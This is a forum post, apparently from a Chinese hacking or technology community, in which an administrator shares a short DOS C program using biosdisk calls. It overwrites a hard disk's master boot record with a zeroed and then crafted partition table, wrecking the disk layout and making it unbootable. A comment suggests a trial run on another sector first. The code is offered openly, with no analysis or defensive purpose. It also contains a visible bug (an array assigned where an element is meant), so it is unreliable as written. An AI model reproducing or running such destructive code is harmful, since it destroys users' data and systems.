Wei.H
论坛-管理员
岁月联盟 - 最高管理
# include <bios.h> # include <dos.h> # define N 0x200 main() { int i; unsigned char s[N]; biosdisk(2,0x80,0,0,1,1,s); biosdisk(3,0x80,0,0,3,1,s); for(i=0x1be;i<0x1fe;i++) s=0; s[0x1c0]=1; s[0x1c2]=5; s[0x1c3]=1; s[0x1c4]=1; biosdisk(3,0x80,0,0,1,1,s); /* 可以先改成试试biosdisk(3,0x80,0,0,7,1,s); */ }
查看个人网站
查看详细资料
TOP